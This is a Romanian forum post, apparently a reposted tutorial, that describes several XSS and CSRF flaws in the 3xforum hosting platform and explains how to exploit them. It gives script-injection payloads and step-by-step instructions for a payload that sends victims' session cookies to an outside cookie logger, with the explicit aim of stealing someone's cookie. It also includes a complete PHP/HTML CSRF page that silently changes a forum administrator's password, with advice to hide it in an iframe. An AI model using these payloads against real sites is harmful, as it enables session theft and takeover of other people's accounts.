ddl
Membru
 Din: San Venganza
Inregistrat: acum 16 ani
|
|
Acesta este un tutorial de pe. L-am postat in speranta ca Adminul acestui forum va rezolva toate problemele semnalate,mai ales ca sunt foarte grave
*Daca cititi acest articol, se presupune ca aveti cunostinte de baza despre vulnerabilitatile web. *Articolul este divizat in 2 parti: #1) Prezentarea catorva vulnerabilitati #2) Prezentarea unei metode de utilizare a acestora
####### #Vuln 1# #######
Un XSS foarte interesant prin faptul ca e persistent. Vulnerabilitatea apare la postarea unui mesaj si afecteaza toti utilizatorii. La postarea unui mesaj, se pune in titlu:
Code:
</title><SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
Efectul … javascript-ul este executat. Exemplu:
Code:
http://xsst3st.3xforum.ro/post/8/1/title_SCRIPT_SRC_http_ha_ckers_org_xss_js_SCRIPT_/ |
####### #Vuln 2# ####### Aceasta vulnerabilitate ii afecteaza doar pe administratori. Campul cu trimiterea unui SMS pentru inlaturarea reclamelor e si el vulnerabil. Introduceti:
Code:
"><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> |
In http://***nume_forum***.3xforum.ro/admin_index.php . Efectul e din nou cel asteptat: codul nu e filtrate si javascript-ul este executat.
####### #Vuln 3# #######
O alta vulnerabilitate de tip XSS se regaseste in chat. Este un XSS non-persistent, dar, spre deosebire de primul XSS non-persistent, este pe baza de GET, asa ca e putin mai simplu de folosit. Vulnerabilitatea:
Code:
http://***nume_forum***.3xforum.ro/chat/?room="><script src=http://ha.ckers.org/xss.js ></script> |
Acum, pentru a exploata aceasta vulnerabilitate,trebuie sa urmariti cativa pasi:
1. Daca nu aveti, faceti-va cont pe . Daca aveti, logati-va (in caz ca nu sunteti deja logat). 2. Intrati pe . 3. Dati un scroll pana jos, la legenda cu utilizatorii. Dati acolo click pe nick-ul vostru. 4. Copiati URL-ul. Va fi ceva de genul: 5. Pastrati doar caracterele numerice. In cazul meu, ramane doar: 193 6. Copiati sirul : <script>document.location="http://rstzone.org/index.php?pagina=cookie_logger&user= ***&logheaza="+document.cookie;</script> 7. Inlocuiti asterix-urile cu numarul obtinut anterior. In cazul meu, am obtinut <script>document.location="http://rstzone.org/index.php?pagina=cookie_logger&user= 193&logheaza="+document.cookie;</script> 8. Intrati aici si puneti in primul camp textul obtinut, dupa care copiati textul generat: 9. Inlocuiti, in acest script, ceea ce este notat cu ***nume_forum*** cu numele forumului, si ceea ce este notat cu ***script*** cu textul generat anterior: http://***nume_forum***.3xforum.ro/chat/?room="><script>document.write(***script***)</script> 10. Salveaza link-ul si fura cookie de la cineva. Pentru a la vizualiza, tot ce trebuie sa faci este sa accesezi: ... izualizare 11. Ai terminat, nu uita sa imi multumesti :P.
####### #Vuln 4# #######
Din pacate (sau din fericire, pentru unii :P), asupra unui admin 3xforum pot fi tintuite si atacuri CSRF. De exemplu, din cauza ca nu se tine cont de refer ,unui admin ii poate fi schimbata parola fara macar sa isi dea seama. La afisarea paginii, acest exploit schimba parola administratorului de pe forumul “xsst3st” in “parola”. Pentru a schimba parola unui alt site, trebuie doar sa inlocuiti, in a treia linie, valoarea variabilei $site. Daca vreti sa setati alta parola, trebuie sa schimbati, pe a cincia linie, valoarea variabilei $password. Valoarea $id, de pe a patra linie, va recomand sa o lasati neschimbata, pentru ca aproape toti administratorii forumurilor 3xforum au id-ul numeric 2. Desigur, functioneaza doar daca cel care intra pe pagina este administratorul. Pentru a fi mai silentios, poate fi folosit prin iframe.
Code:
<?php
$site ="http://xsst3st.3xforum.ro";
$id="2"; //valoarea default este 2
$password = "parola"; //parola cu care ii va fi schimbata parola curenta
$site = $site . "/profile.php?action=change_pass&id=";
$link = $site . $id;
$html = <<<HTML
<form method="post" action="http://xsst3st.3xforum.ro/profile.php?action=change_pass&id=2" id="change_pass" name="tw8">
<input type="hidden" name="form_sent" value="1">
<table class="punmain" cellspacing="1" cellpadding="4">
<tr class="punhead">
<td class="punhead" colspan="2">Schimbare parola</td>
</tr>
<tr>
<td class="puncon1right" style="width: 140px; white-space: nowrap"><b>Parola noua</b> </td>
<td class="puncon2">
<input type="password" name="req_new_password1" size="16" maxlength="16" value="$password"><br>
<input type="password" name="req_new_password2" size="16" maxlength="16" value="$password"> Introduceti parola inca o data </td>
</tr>
<tr>
<td class="puncon1right" style="width: 140px; white-space: nowrap">Actiuni </td>
<td class="puncon2"><br> <input type="submit" name="update" value="Submit"><br><br></td>
</tr>
</table>
</form>
<script>
document.tw8.submit();
</script>
HTML;
echo $html;
?> |
########### #Observatie# ###########
Ceva nefolositor, dar care se merita amintit. Pentru admini, 3xforum are un sistem ce permite vizualizarea mesajelor in timp real. Faceti un utilizator intitulat “';alert(1);i='” (fara ghilimelele duble, dar cu ghilimelele simple) si postati un mesaj pe un forum pe care sunteti admin. Dupa putin timp, intrati pe http://**nume_forum**t.3xforum.ro/live2.php si uitati-va la sursa. Veti observa ceva de genul “\';alert(1);i=\'”. Daca ‘ nu ar fi inlocuit cu \’, ar fi un alt XSS persistent. Dupa cum am zis si mai sus, nefolositor, dar se merita amintit.
sursa tw8
Astept corectari, adaugiri si pareri de tot felul.
bafta |
Modificat de ddl (acum 16 ani)
_______________________________________ my ddl
|
|